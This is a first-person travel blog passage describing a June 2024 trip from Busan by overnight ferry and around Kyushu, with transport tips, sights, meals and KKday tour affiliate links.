The space is very small, accommodating up to 11 people. This time, it was a family (3 people) + two couples (4 people) + me and my friend (2 people), not fully occupied; It seems that people of the same language and nationality are arranged together (except for one couple from Hong Kong and Macau, the rest are Taiwanese).
Luggage was settled around 20:00; the ship departs around 22:30.
On the 3rd floor, there is a restaurant, a convenience store, and vending machines (all using Japanese yen), selling slippers, toiletries, and sanitary products; the restaurant does not serve meals, so you can only buy instant noodles from the convenience store or microwaveable food from the vending machines; Therefore, it is recommended to bring food from Busan.
Note: Meat products cannot be brought into Japan, any leftovers must be discarded. ⚠️
Luckily, I had a sandwich before boarding, so I wasn’t very hungry, just bought some instant noodles to fill up.
Note: Hot water is not available in the restaurant area, only cold water; you need to go to the hot-water room near the stern of the ship to get hot water, and it took me a while to find it.
Also, be careful when operating the water heater, turn on the switch first, water won’t come out immediately, wait a bit, be careful when using the hot water, make sure to turn it off tightly after use to avoid scalding the next person.
After eating, walk around the deck (you can freely enter and exit, be careful of slippery).
Around 21:00, another cruise to Kanmon Strait (PUKWAN FERRY) will depart first.
Look back at the night view of Busan Port Terminal.
Around 22:30, the ship will start to leave Busan Port, passing by Busan Port Bridge. The night view of the bridge is very beautiful (it will be cold, so stay warm).
The lights in the economy cabins are turned off at 23:00. After watching the departure, you can pretty much go back and lie down.
Good night, Busan.
Around 5:30 in the morning, arrive at Hakata, the lights in the cabins are turned on; go to the deck to see the peaceful morning of Hakata Port and Hakata Port Tower.
If you have purchased breakfast, you can go to the restaurant to eat. We didn’t, so we slowly freshened up, wandered on the deck, packed up, and prepared to disembark.
Disembarkation will start at 07:30, everyone will queue at the exit of the 3F lobby with their luggage.
Reminder: Hakata Port does not support electronic customs clearance, so be sure to fill out the entry card and customs declaration card. ⚠️
There is a bus to Hakata Station or Tenjin area as soon as you come out.
Around 9:30, after dropping off luggage at the hotel, have a breakfast of Asa no Kaizoku Teishoku at the Hakata Station department store food street to fill your stomach, pick up the JR Pass, and get the ticket for tomorrow morning to Yufuin.
[_Reference itinerary: KKday [Fukuoka Chartered One-Day Tour] Saga Prefecture, Kyushu, Japan Yutoku Inari Shrine, Yanagawa River Cruise, Minami Shimabara Dolphin Watching, Ooarai Shrine’s Torii Gate in the Sea, Takezaki Seafood, Daikousenji Temple Freely choose the attractions you want to visit_](https://www.kkday.com/zh-tw/product/144332?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
Originally planned to go to Karatsu Castle, after checking the JR limited express schedule, going to Yutoku Inari Shrine is faster and closer, plus the fatigue from yesterday, so decided to change the itinerary.
From Hakata, take a train to Kashima City - Hizen-Kashima Station.
After exiting the station, walk to the left side of the road and wait at bus stop 2 across the street.
The instructions here are different from Google Maps, which told me to walk to Nakamuta Station to wait for the bus, about 500 meters away.
Please note that I went there in June 2024, and the schedule may have changed due to the time.
After getting off at Yutoku Shrine, walk towards Omotesando.
It seems that there were hardly any people or open shops on Omotesando and the shopping street on weekdays.
Keep walking to the end (about 15 minutes), and you will reach the shrine.
At the entrance of the shrine, there is an elevator behind the glass building. If you don’t want to walk up, you can take the elevator for a fee.
As you walk up, there is a row of wind chimes for prayers. When I was there, there were no people, and as I passed by the wind chimes, a gust of wind made them ring loudly.
Pass through the row of torii gates and beautiful hydrangea flowers. You can also climb up to the Okunoin (about 200 meters, steep and difficult to walk).
After visiting, return to the station and take the JR train back.
After weighing the torii gate in the sea at Ooarai Shrine against Karatsu Castle, I felt the sea torii was fairly ordinary (after all, I have seen the famous torii in the sea at Itsukushima Shrine) and the transportation was inconvenient, so I planned to visit Karatsu instead.
There was a mistake when changing trains. This small station had no electronic signboards. I got off and saw “Towards Karatsu” written on the platform, so I thought I could change trains there. However, when the time came, the train passed through another platform, and I couldn’t get on in time.
After careful examination, I realized that I needed to check the small box in the bottom right corner of the timetable to find the correct waiting platform. The platforms on weekdays and holidays may not be the same.
Since I had missed the train to Karatsu and could no longer fit in the sea torii either, and considering the previous day's fatigue, I decided to head back to the hotel in Hakata to rest.
On the way back, I also discovered something interesting. I was wondering why the trains at the small stations didn’t open their doors (I was in the rear car). Upon closer observation, I found out that at stations without station staff, the train conductor is the station staff. To get off, you need to get off from the first car and pay the fare using the coin slot or swipe your transportation card (similar to buses). If you have a JR Pass, you just need to show it to the driver.
Also, a reminder, if you are at an unmanned JR exit, just walk out with your JR Pass, do not throw it into the ticket recycling box.⚠️
Note that the washing machines at Toyoko Inn may not include detergent; before washing, check whether the machine dispenses detergent automatically. ⚠️
If not, you need to add coins for detergent or buy it at the front desk. (30 yen)
After putting the clothes in the washing machine, I went to the underground street of Hakata Station to find food.
I bought a beef bento for dinner, it was great; the tea wine was okay, not much flavor.
I also bought Yakult to drink at night, BRULEE caramel ice cream for dessert (very sweet!), and fried shrimp as a midnight snack (this time I bought the whole fried shrimp, previously bought a fake one in Kumamoto QQ).
Laundry (30 mins), drying (1 hr), rest.
Early in the morning, checked out and headed to JR Hakata Station to take the Yufu 1 to Yufuin.
Upon arrival at Yufuin Station, immediately turn right and go to the coin lockers to store luggage; lockers large enough for a suitcase are limited. (1,000 yen)
Possibly due to the season and weather, it felt overall gray and green, without any special feeling when I went.
Walking along the street, you will reach Kinrinko Lake, a green lakeside exuding a hint of tranquility.
Lake Kinrinko is very clean and clear, with many maple leaves (not yet changed color) by the lake.
The street from Yufuin Station all the way to Lake Kinrinko is full of IP and cultural and creative small shops to explore. If you are interested in food, you can also check out the award-winning desserts in Yufuin, such as pudding, ice cream, and more.
Of course, you can also see the Totoro Forest, Ghibli Shop, and the “Kyushu specialty” Kumamon everywhere.
The Showa Museum in Yufuin has a very traditional Japanese feel.
The Flower Village seemed too touristy and crowded, so I didn’t go in specifically.
On the way, I bought the famous pudding taiyaki and some souvenirs (sesame powder, Yufuin Brick Factory - Shichifuku, cultural and creative items, Yufuin incense…).
Side note: Can you believe I ran into a colleague in this paradise of Yufuin XD - Pinkoi Community Sister
For lunch, we originally planned to eat the famous Yufu Mabushi, a Yufuin kamameshi dish. There are two locations, one at the main store near Lake Kinrinko and one at the station exit. The one at the station exit was closed that day, and we were too lazy to walk back to the main store, so we ended up eating at Sushi Minamoto on the 1st floor.
I had the Bungo beef steak, and my friend had the rice bowl; the beef was delicious, very fragrant, juicy, and not too gamey, and the price was reasonable.
After eating, we strolled around until around 15:00 and then took a car to continue to Oita.
There are quite a few trips from Yufuin to Oita, and there are fewer people (maybe more people are returning to Hakata?). There are also local trains. This time we took the local train directly and practiced the new Japanese I learned:
この電車は大分に行きますか。 (Does this train go to Oita?)
はい、大分に行きます。 (Yes, it goes to Oita.)
I happened to encounter an art installation at Oita Station (it even makes sounds).
Oita gives off a quiet atmosphere, away from the hustle and bustle. When wandering in the city area, it feels unusually quiet, with only the faint sound of car engines, and not many people or car noises.
First, drop off your luggage at the hotel. The layout of Toyoko INN is similar, and I happened to get a room with the same layout and angle as the one in front of Hakata Station yesterday, but the difference is that the bathroom here is bigger and the hallway is smaller.
It’s still early, so I thought about taking a walk around the area and casually opened Google Maps to see nearby attractions.
On the way to Oita Castle Ruins, there is a huge bougainvillea at the park’s parking lot (looks like some curse from Jujutsu Kaisen).
Oita Castle Ruins only have moats, walls, and gardens left. Inside is an open parking lot and a platform for the castle tower, where you can overlook Oita City.
The official AR App allows you to see what Oita Castle looked like before.
Strolling back to the station market for food, Oita’s buses have a nostalgic feel but are well-maintained.
Not sure what to have for dinner, so I randomly bought a pork cutlet rice bowl and a non-alcoholic Suntory sparkling drink (delicious!); the Japanese sauce packets are thoughtfully designed with a small corner for easy opening.
For supper, there was strawberry smoothie ice cream, barbecue, and limited edition Kirin pineapple liquor (enough pineapple flavor, a bit sweet).
Itinerary reference:
KKday Beppu Yufuin Day Tour Nishi Ryoji + Beppu Hells + Yufuin (Departing from Fukuoka)
Kyushu Beppu Hell Hot Spring Tour | Regular Ticket / Presale Ticket | Buy Now
It only takes about 15 minutes by JR Limited Express from Oita Station to Beppu Station, and the scenery along the way is somewhat similar to the feeling of Hiroshima to Onomichi.
Head to the Beppu Hells by bus from the JR station; the first stop is Sea Hell (Umi Jigoku), and the visiting order can follow the itinerary in the picture.
Sea Hell is the most spectacular in my opinion, with constantly churning steam and deep blue spring water.
There is a platform and a small shrine behind.
The small blood pond on the other side is quite unique.
After leaving Sea Hell, follow the signs to reach the next Oniishibozu Hell.
Mainly a mud geyser hell.
There are signs pointing to the next hell when you come out.
The milk pond in Kamado Jigoku feels great to soak in.
But the feature of Kamado Jigoku is not spring water, it’s smoke. The staff will use incense and blow air towards the hot spring steam to produce a lot of smoke, which is quite interesting (according to the explanation, it’s because the particles of incense will attract more water vapor molecules causing aggregation).
Another feature of Kamado Jigoku is the row of hot spring experiences, such as rock bath, drinking salty thick hot spring water, foot bath, steaming face, hands, and throat (similar to a pediatrician in Taiwan XD).
The space here is larger, with more experiences available, and the shops also sell some food, so you can take a break here.
You can see a sign pointing to Oniyama Hell when you come out.
The boiling water in Oniyama Hell is more intense, constantly surging out.
The other side of the park is the crocodile park.
Coming out and following the instructions will lead you to Shiraike Jigoku.
You will pass by the Jigoku Onsen Museum (cafe) where you can take a break.
Shiraike Jigoku is relatively unremarkable, with a small tropical fish aquarium.
The remaining Blood Pond Jigoku and Tornado Jigoku are not in this area and require taking a bus to reach.
Coming out of Shiraike Jigoku, walk down to the intersection and turn left, then head to the waiting area at the Kannawa No. 2 bus stop.
First, visit Blood Pond Jigoku, a larger version of the small blood pond in Umi Jigoku.
Walking down will lead you to Tornado Jigoku.
Tornado Jigoku is a geyser that erupts intermittently, about every 30-40 minutes, lasting 6-10 minutes each time. You can inquire with the staff at Tornado for the eruption schedule (we were informed by the staff), if it’s about to erupt, you can watch it first, otherwise, head to Blood Pond Jigoku.
The smoke during the eruption forms a tornado, hence the name.
Lunch can be enjoyed directly at the Gokuraku Pavilion in Blood Pond Jigoku.
Try the famous Hell Gokuraku Curry, with Japanese-style rice topped with thick curry (mildly spicy), grilled vegetables, and chicken, it’s delicious and refreshing without being greasy.
After eating, check out nearby attractions such as Kibune Castle, Cross Mountain Observatory, Me-tan Jigoku, Yunohana…
On the way back to the Kannawa No. 2 bus stop, consider visiting Kibune Castle. The castle is small, but the view from the lookout is nice; however, the uphill walk from the bus stop is quite tiring.
The Cross Mountain Observatory, Me-tan Jigoku, and Yunohana are actually further up from Umi Jigoku; if you plan your itinerary again, you should visit these attractions first before heading down to Umi Jigoku, then proceed all the way to Blood Pond Jigoku and Tornado Jigoku, or vice versa starting with Blood Pond and Tornado.
Boarded the bus again, passing Umi Jigoku once more, heading to the Cross Mountain Observatory in Beppu City; the sun was scorching, and the observatory has only restrooms, no shops or rest areas.
The lush greenery on the opposite side of the entrance was very beautiful.
Since the observatory is known for its night view, there wasn't much to see in the morning, just the scorching sun.
Descending back to Alum Hell, the ticket counter is across from Okamotoya Pudding Shop, just ask the staff to go across.
You can taste a steamed pudding from hell before leaving.
The Yunohana huts are used to crystallize hot-spring mineral deposits (yunohana); go up to the Yunohana shop and you can buy hot spring bath salts.
Bought some bath salts, face masks, and lotion as souvenirs at the Yunohana Shop.
They also offer private baths for those who are shy about public bathing.
Around 4:00 PM, getting ready to take the bus back to the city.
After returning to Beppu Station, walk to Beppu Tower, and explore the area on the way. (Front statue, old hot spring pavilion, and O-Tengu)
Buy tickets from the vending machine on the first floor of Beppu Tower, take the elevator up, and enjoy the cityscape of Beppu’s coastal area.
Viewing the streets and cars from above is very soothing.
There is a meteorite exhibition inside the tower.
In addition to the Beppu Tower, you can also take a cable car or visit the new Beppu - Tower of the World.
The Beppu Tourism Bureau website also provides other itinerary references :
Return to the hotel to rest.
After resting at the hotel, go to the Oita Station market to buy dinner, pork cutlet bento, and Oita limited fruit wine (refreshing and not too sweet).
Desserts/late-night snacks include fried shrimp, instant noodles, white peach ice cream, and jasmine tea (I don’t like jasmine tea).
[_KKday itinerary reference: Japan Fukuoka Kitakyushu chartered one-day tour Dazaifu Tenmangu Shrine, Moji Port, Karato Market, Kanmon Straits, Akama Shrine_](https://www.kkday.com/en/product/157874?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Start from Oita to Kokura, then go to Moji Port, Shimonoseki. Shimonoseki and Karatsu are about 140 kilometers apart, and normal people wouldn’t plan this itinerary; because on the first day in Japan, I took the wrong train and missed Karatsu, so I really wanted to visit this place, hence the determined one-day trip to Karatsu.
Woke up late, around 8:40 from Oita took the JR Limited Express to Kokura, planning to leave luggage in Kokura and then take a branch line to Moji Port.
It started drizzling in Oita, and I realized it has rained in every city I’ve visited. (Rain god confirmed)
Around 10 o'clock I arrived at Kokura Station and wandered around for a while; all the coin lockers were full (a friend said there were still spots at 9 o'clock), and the staffed luggage counter doesn't open until 11, so I had to carry my luggage on to Moji Port and try there.
After exiting Moji Port Station, turn left (no need to leave the building), there are self-service Coin Lockers, quite crowded this time, all full; fortunately, the manned luggage counter has started operating, successfully checked luggage (but the manned counter only operates until 8 pm! ⚠️).
I was thinking of having some Moji curry bread, last year there was no queue, enjoyed it without waiting, but upon exiting the station, I saw a long queue and gave up, turned right to Moji Port Bus Station to wait for the bus to Shimonoseki.
Got off at the underground pedestrian walkway at Shimonoseki Station, this time looking at the Kanmon Bridge from a different angle, the view on the right is from the Moji Port Retro Observatory.
There is a torii gate of the Hofuri Shrine here, with the shrine itself and its observatory on the mountain behind.
From the pedestrian entrance, take the elevator down to the walkway level. Walking through is free for pedestrians, while bicycles pay a 20 yen toll; also watch out for wild boars around the area.
The walkway is 780 meters long, running straight to the other end, with the prefectural boundary line marked partway along.
After passing through the gate, there are shops selling simple snacks. I bought an octopus cake to fill my stomach. (It’s chewy inside, crispy on the outside, with real octopus, delicious!)
From the opposite angle, you can see the Kanmon Bridge and the Moji Port Retro Observatory, giving a feeling of looking from Bali, Taiwan to Tamsui.
Continue hiking along the coast to the Karato Market.
On the way to the Karato Market, you will pass by the Akama Shrine, so it’s worth stopping by for a visit.
On the coast outside the Karato Market, many people buy food and have picnics outside. Although there are many people, it is still very clean. Since I was mainly sightseeing and not a big fan of raw food, I didn’t go inside to see, but it seemed crowded at lunchtime.
After the Karato Market, you can take a ferry back to Moji Port. You can buy tickets at the ticket machine outside the store on the other side. If you have time, you can also visit Ganryu Island (Let’s duel! The sacred place!).
It takes about 10 minutes to reach Moji Port. (It really feels like taking a ferry from Tamsui to Bali!)
As it started to rain when I returned to Moji Port, and I had visited Moji Port last year, I didn’t stay long and prepared to go to the station to pick up my luggage and head to Kokura and Hakata.
It was around 14:00, and checking the schedule I found I could reach Karatsu Castle around 16:30. Every second counted, so I unleashed the power of New Taiwan Dollars (well, yen) at Kokura and bought a separate ticket for the San'yo Shinkansen Kokura-Hakata segment, where trains run at up to 300 km/h; it takes only about 15 minutes (versus 45 minutes by JR limited express and 65 minutes by local train).
The JR Kyushu Pass does not cover the San'yo Shinkansen (Kokura-Hakata segment); for trains such as Nozomi and Mizuho you need to buy a separate ticket at the Shinkansen counter. Trying to use the JR Pass at the gate will be refused, and even if you accidentally get in or out, you will be stopped and required to buy a ticket (based on past experience). ⚠️
From JR Karatsu Station it is about a 20-minute walk to Karatsu Castle, so I decided to take the highway bus instead, which drops passengers off just before the bridge in front of Karatsu Castle. (It was my first time taking it!)
Upon arrival in Hakata, I took the subway to Tenjin Minami and stored my luggage in the underground shopping area. (Luckily, I found the last available locker at spot 2.)
From Exit 8 of Tenjin’s underground street, follow the signs to Fukuoka Mitsukoshi department store and head to the 3rd floor of Tenjin Bus Center to reach the bus stop.
As I was unsure about seat reservations and ticket purchases, I directly went to the counter to buy a ticket. After buying the ticket, feeling hungry, I grabbed a bread from Starbucks and queued up at the designated platform for boarding. (Later, I found out that no seat reservations are needed for Karatsu, and you can use a transportation card just like taking a bus. The fare is a fixed 1,100 JPY regardless of the stop.)
At 15:02, I boarded the high-speed bus to Karatsu (Hodoyabashi), with the bus occupancy rate at around 80%.
The image on the right is the view of Fukuoka Tower from this road last year; this year I passed the same spot and saw the same view again. (A sense of time and space overlapping.)
The bus mainly serves local commuters; after it passed through Karatsu city, I was the only passenger left, and I rode all the way to the final stop, Hodoyabashi.
[_KKday private car itinerary reference: “[Fukuoka Private Car Day Tour] Kyushu, Fukuoka Prefecture Fukuoka Tower, Dazaifu Tenmangu Shrine, Ohori Park, Karatsu, Sakurai Futamiura, Yobuko Asaichi, Shima, Tenjin Underground Street Flexible itinerary combination!”_](https://www.kkday.com/zh-tw/product/144234?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
After getting off, a short walk ahead is Hodoyabashi, and walking further back leads to Karatsu Castle. Seeing the view of the bridge and castle from this angle made all the traveling worthwhile.
Around 16:35, with only 25 minutes left before Karatsu Castle closed, I decided to take a stroll since I was already there.
Karatsu Castle requires a walk up a hill from below. With time running out, I turned left and took the elevator up to Maizuru Park next to it.
A one-way elevator ride costs 100 JPY. Purchase a ticket from the vending machine at the entrance and hand it to the staff.
The Tenshukaku is closed for visitors, just come up to see the scenery and Karatsu Castle.
Return to the entrance before the elevator closes, and walk back to JR Karatsu Station following the tourist map.
Take the stone wall path to Karatsu Shrine. (Few people on the way, desolate)
Karatsu Shrine (closed after 17:00), Former Karatsu Bank (designed by the same architect as Tokyo Station - Kingo Tatsuno).
Near the station is the Hikiyama Exhibition Hall (also closed after 17:00), where you can only see small models at the station.
Arriving back at Karatsu Station, take the JR line toward Hakata and get off at Tenjin Minami; I ran into an issue when exiting, because the journey started at JR Karatsu but ended at the subway's Tenjin Minami station, where the staff do not accept the JR Pass, so I had to buy a ticket for the whole journey (JR Karatsu to Tenjin Minami) separately QQ.
It was raining heavily in Hakata (the rain god was angry), so I bought a rice ball in Tenjin Underground Street for dinner and headed to the hotel with my luggage.
APA Hotel Fukuoka-Watanabedori EXCELLENT
This APA hotel has more space, but the facilities are quite old. It was my first time staying in an APA without a unit bath, and there is no large communal bath and none of the smart integrations (washing machine status check, AirPlay…).
Snack was strawberry smoothie, late-night snack was convenience store fried chicken, and Akiya (very sweet).
End of a long day.
It was cloudy in the morning, also the last day of JR Pass, unable to change the itinerary, had to continue taking the train to Sasebo.
JR journey takes about an hour and a half, recorded a segment of the JR Kyushu train broadcast as a memory.
On the last segment into Sasebo, the train runs in the reverse direction (about 10 minutes). If you are prone to motion sickness, you can use the foot pedal to rotate the seat and switch its direction.
After exiting Sasebo Station, cross the road to the opposite side and walk to find bus stop No. 6, heading to “Kujukushima Aquarium.”
Transfer to a bus to Kujukushima Aquarium Station and walk about 5 minutes to the Kujukushima Cruise Visitor Center, where you can buy tickets to board the ship. (Show your JR Pass for a discount)
KKday Online Ticket Purchase: Japan Kyushu Nagasaki | Kujukushima Cruise Ticket
Kujukushima Official Website Information
This time, I boarded the white Pearl Queen at 11:00.
Heavy rain, bad weather, unable to become the king of the sea, can only hold an umbrella, blow the wind, and get wet in the rain.
There are broadcasts in Chinese, English, Japanese, and Korean on board, the journey takes about 50 minutes, there are toilets and a shop.
You can go up to the deck and birdwatching platform outside the cabin, but we didn’t go up due to heavy rain and strong winds that day.
When the ship passes between two islands, the wind can be particularly strong, so be careful.
There are seats inside the cabin.
After the tour in heavy rain without seeing much, we returned to Sasebo all the way.
On the way back, stop by Hachi no Ie to taste the famous lemon steak from Sasebo.
Lemon steak is four thin slices of steak + sauce + lemon slices + lemon juice, refreshing taste, slightly insufficient amount of meat.
After eating, I ordered another specialty fruit puff, which is filled with generous fillings and real fruit chunks inside.
After eating, I strolled through the shopping street and took the bus back to the station.
Taking the train back in the (Hakata / Takeo-Onsen) direction; Sasebo is the terminal station, so you have to wait for the cleaning staff to finish before boarding. Just like on the way in, the train reverses direction between Haiki and Sasebo.
The time is about 13:30.
You can also go to Huis Ten Bosch in Sasebo, but I didn’t specifically plan to go there.
KKday Sasebo reference itinerary:
_KKday itinerary reference: “Kyushu Saga One-day Tour Yutoku Inari Shrine, Ureshino Onsen, Mikunoyama Park, Takeo Library & Takeo Shrine/Tosu Premium Outlets Departing from Fukuoka Hakata”_
Last time I changed trains at Takeo-Onsen on the way to Nagasaki and didn't have much impression of the station. Later I started following Takeo City's tourism Instagram (the official account regularly holds events, such as a free firefly-viewing shuttle; if you want to visit Takeo for hot springs and accommodation, it's worth following). This time, since I was passing by anyway and had time, it seemed like a good opportunity to take a look.
From Takeo Station (unmanned station, no need to insert JR Pass, just exit), when you come out on the street, there are few people and it’s very quiet.
Just passing by, I only went to the main attractions I found, which happened to be diagonally opposite. There are not many bus schedules, and I didn’t want to wait, so I walked directly.
First, I went to Takeo Shrine, and on the way, you will pass by Tsukasaki Okusu, a small attraction.
Tsukasaki Okusu, estimated to be 2,000 years old.
From the bottom, walk up a short flight of stairs to the Takeo Shrine.
Next to the Takeo Shrine, pass through the sacred tree gate and walk about 5 minutes to see the legendary Takeo Great Camphor Tree. (Estimated age of the tree is 3,000 years.)
The Takeo Great Camphor Tree is enclosed and can only be viewed from a distance.
Bought a Takeo Shrine Great Camphor Tree guardian charm (1,500 yen), larger in size + wooden box.
After visiting the Takeo Shrine, walk back to see the other side of the Horaiyu Monument.
The entire hot spring street is deserted, with several hot springs and hotels to choose from (not necessarily Horaiyu), if you want a quiet and convenient transportation option for hot spring bathing in Kyushu, Takeo Onsen is a great choice!
Just a visit here.
After entering the monument, there is the Horaiyu hot spring for bathing, and on the other side, there is the Egret Hot Spring for accommodation.
Takeo City tourist map, found information about the Mifuneyama Rakuen which looks good, but it was already around 15:30, too late to go.
Boarded the express train to Hakata, returned to Hakata around 18:00.
Strolled back to the hotel, dinner casually solved at the convenience store, rice balls, pork cutlet sandwich, Fujiya Peach Soda (delicious!); stayed at APA and Toyoko Inn many times before realizing they have ice makers, so cool!
Excluding the old equipment, the room size and view of this APA hotel are really nice.
No more JR Pass.
[_KKday charter itinerary reference: “[Fukuoka Charter Day Tour] Kyushu, Fukuoka Prefecture Fukuoka Tower, Dazaifu Tenmangu Shrine, Ohori Park, Karatsu, Sakurai Futamiura, Yobuko Asaichi, Itoshima, Tenjin Underground Street Flexible itinerary combination!”_](https://www.kkday.com/zh-tw/product/144234?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
After checking out of the hotel in the morning, take the JR to Kyudai Kenkyu Toshi Station.
Upon exiting, the platform for the Nishi-no-Ura Line is on the left-hand side, with staff guiding the way, the ride takes about 30 minutes.
The fare is the highest bus fare I have taken, 730 Japanese yen.
After getting off, it is the couple rocks of Sakurai Futamiura.
It looks very beautiful and peaceful.
After this, you can visit Sakurai Shrine (it is said that many fans go there to pay homage because it has the same name as the Japanese group Arashi members) or go further to Kaiya Omon Sightseeing Boat (looks cool!).
The return schedule, direct to Hakata every hour in the afternoon, and to Kyudai University Research City Station every hour.
Back to Hakata around 12:30 noon, first go for food.
Revisited Hakata Miyachiku (a Miyazaki beef specialty restaurant) to have their Miyazaki beef business lunch.
The business lunch is great value (in the evening they serve high-end yakiniku set meals), plus there are individual booths, perfect for the socially anxious.
This time I ordered the 200 g lean meat set meal for 3,200 yen and devoured two bowls of rice (rice and soup are free to refill).
After returning to Hakata, take the train to Nanzoin-mae Station.
Walk out of the station, pass by Kojin Tea House (you can take a break and have lunch here), cross the street, and you will reach the entrance of Nanzoin.
After climbing the platform, you can see the main statue of the reclining Buddha, with scriptures on the soles of the feet, overall very magnificent and solemn.
After the visit, take the train back to Hakata Station, arriving around 15:40.
Visit some places in Kyushu that were missed last time.
Gion - Tochoji Temple
You can visit the Fukuoka Daibutsu on the second floor of Tochoji Temple (50 yen). After the visit, there was still about an hour before the planned 17:00 dinner at Teppan Fried Dumplings Iron Pot, so head to Ohori Park first.
Ohori Park
Ohori Park is quite large, it takes about 45 minutes to walk around; you can also ride a swan boat.
Fukuoka City Art Museum is closed on Mondays, so you can only admire Yayoi Kusama’s pumpkin from a distance.
By the time you finish exploring, it’s about 17:00, time for dinner!
I’ve been here once before and still remember the crispy fried dumplings.
There is another branch - Teppan Fried Dumplings Iron Pot Hakata Gion Store, but when I passed by a few days ago, the door was locked with a notice saying it’s under renovation, please visit the main store. (However, Google Maps still shows it’s open)
Self-service for sauce and water.
The store only accepts cash, no electronic payments. ⚠️
Around 17:20, seeing people waiting outside, shortly after, the elderly lady staff came out to welcome us in.
This time I knew to order two servings of fried dumplings. Last time, the elderly lady gestured that one serving wasn’t enough (I didn’t understand at that time), 1 serving with 8 dumplings (500 yen), two servings with 16 dumplings, and a glass of draft beer to end this round!
The dumplings are freshly made and fried, they sizzle when served, the skin is thin and crispy, and the filling is probably chive and pork, simple, not salty, and full of the ingredients’ own flavors.
After finishing eating at 18:00, some people started queuing outside.
After dinner, on the way back to the hotel, passing by the preparations for Nakasu Yatai, this time I found many shared bicycles.
I've been changing hotels constantly this trip, which is tiring; this is the hotel for the final three days.
For dessert, ice cream, and late-night snack, a convenience store hot dog.
[**Join the “【Group Tour, Daily Departure】Japan Kyushu Day Tour | Takachiho Gorge & Amano Iwato Shrine & Tian’an River (including special Aso Akagyu BBQ set meal) | Departing from Fukuoka” itinerary directly.**](https://www.kkday.com/zh-tw/product/32511-kyushu-chinese-guided-day-tour-from-fukuoka-takachiho-gorge-kamishikimi-kumanoimasu-shrine-amanoiwato-shrine?cid=19365&ud1=cb65fd5ab770){:target=”_blank”}
Find the guide for the day trip to your destination in front of the square at LAWSON Hakata Station Hakozaki Exit Store. (There will be several groups at the same time, including those led by KKDAY, EasyGo, those going to Takachiho, those going to Yufuin, etc.)
The guide (Chinese) has a list and will tell you the car number after check-in. Remember the car number and you can board directly.
Seats are first-come, first-served. If there are special circumstances (car sickness), please inform the guide.
Takachiho Rowing requires a reservation three days in advance, with limited slots for each time slot ⚠️
The rowing journey is not long, it should end in about 30-45 minutes round trip. Lunch will be finished around 12:00, the Takachiho itinerary will end around 13:20, and you will need to gather again for the return.
Three groups in our tour have reservations.
Therefore, if you want to combine a day trip with a rowing reservation, 12:00 / 12:30 would be a more suitable time. ⚠️
After lunch, you will need to walk to Takachiho Gorge. If you have a rowing reservation or feel that you cannot handle it physically, the guide will arrange a shuttle directly to save time.
It is still recommended to follow the arrangements made by KKDAY. Before making a reservation, it is advisable to inquire with the official to ensure there are no issues. ⚠️
Due to the long journey, there will be a 10-minute rest stop at a rest area for everyone to use the restroom and stretch.
Takachiho Shrine is surrounded by sacred trees, exuding a tranquil and fresh atmosphere.
Japanese Cedar, the guide mentioned in the car that if you come with family, couples, lovers, or friends, you can hold hands and walk around the tree three times for blessings.
Around 11:20 return to the gathering point and get back on the bus.
After visiting Takachiho Shrine, head to have lunch nearby.
Slippers are required (shoes off at the entrance), and it feels like a restaurant catering specifically to group tourists; still, it was my first experience of this kind of group meal at a Japanese restaurant.
The overall quality of the food was average, leaning towards mediocre, possibly due to the large group resulting in most dishes being cold and the meat being average.
After lunch, follow the guide downhill to Takachiho Gorge.
After about a 20-minute walk, you can see Takachiho Gorge, and from this angle, you can see the end of the gorge (the boat stop line).
Looking back at the ancient road and the boat below from the bridge on the Takachiho side.
The boating area is just down the bridge, and the total length (to the stop line seen earlier) is about 250 meters.
There is a small park and shopping street where you can have ice cream or snacks to recharge.
After getting off the bus, walk about 5 minutes to the Nishi-Hongu of Amano Iwato Shrine, where different masks of the gods hang at the storefronts along the way.
The guide will supplement the story of Amaterasu, the Sun Goddess, introduced on the tour bus.
To go to Amano Iwato, you need to walk a short distance. The guide will walk with everyone to Amano Iwato first, and then you can explore freely (or follow the guide back).
The Amano Iwato Cave is where Amaterasu, the Sun Goddess, once hid; the torii gate of the shrine is surrounded by stones left by worshippers.
On the way back from the visit, you will pass by an ice cream shop.
Everyone lined up for ice cream here, and also tried the local Miyazaki mango ice cream (900 yen). The guide said Miyazaki mangoes are high-quality, but honestly, Taiwanese mangoes have more mango flavor.
After a rest, slowly walk back to visit Amano Iwato Shrine.
After the last itinerary, it was already past 3 o’clock in the afternoon, and it was time to return (still a three-hour drive back to Fukuoka).
On the return journey, there will also be a stop at a rest area for everyone to use the restroom and stretch their legs.
The itinerary ended smoothly; thanks to the guide, Ishinamu, for the guidance and itinerary arrangements. 👏👏👏👏👏
For dinner, I casually bought a convenience store hot dog, the rice ball from the Tenjin Underground Street that I had a few days ago on Day 6, and the new grape-flavored Suntory drink was delicious!! I also had a BRULEE for dessert.
Good night.
The sightseeing part of the Kyushu itinerary is almost at an end, with nearly two days left purely for shopping.
In the morning, I went to Don Quijote (24 hr) for some simple shopping. The Tenjin Main Store is very spacious, with several floors to explore.
Visited the department store near Hakata Station around noon, bought souvenirs, Fukuoka-produced sake, Nagasaki cake from Fukusaya, Kokura Meigetsu rice crackers, and more.
Returned to the Tenjin area in the afternoon, explored Tenjin Underground Street, Le Labo, Iwataya Department Store, Mitsukoshi Department Store, and many more (lots of department stores in Tenjin).
Just ran out of Le Labo Another 13 perfume, so bought a 50ml bottle this time (around $5,800 NTD after tax refund).
Had fun twisting a cute bus stop button at C-pla in Tenjin XD
[YouTube video](https://www.youtube.com/watch?v=JwwjYSU20-c){:target=”_blank”}
It makes a sound when pressed XD.
Carrying the loot back to the hotel, had a hot dog, dessert, and a must-try in Japan! Coca-Cola!
After a rest, headed out again and arrived at Canal City Hakata at 16:30.
Mainly went to the huge gachapon store on B1.
https://gofukuoka.jp/en/spots/detail/196050
Finished shopping and headed to Hakata Station.
Around 17:30, took a bus from Hakata Station to PayPay Dome, watched a baseball game at 18:00.
Today’s match-up: Fukuoka SoftBank Hawks vs. Tokyo Yakult Swallows
Some entry rule reminders: open your bag for the security check, no outside food allowed, you may bring one bottle of tea or water, no outside alcohol, drinks and food are sold inside, and remember to get a re-entry permit if you leave and come back.
The mascot of Fukuoka SoftBank Hawks is named Harry, had to come and support the team at the game.
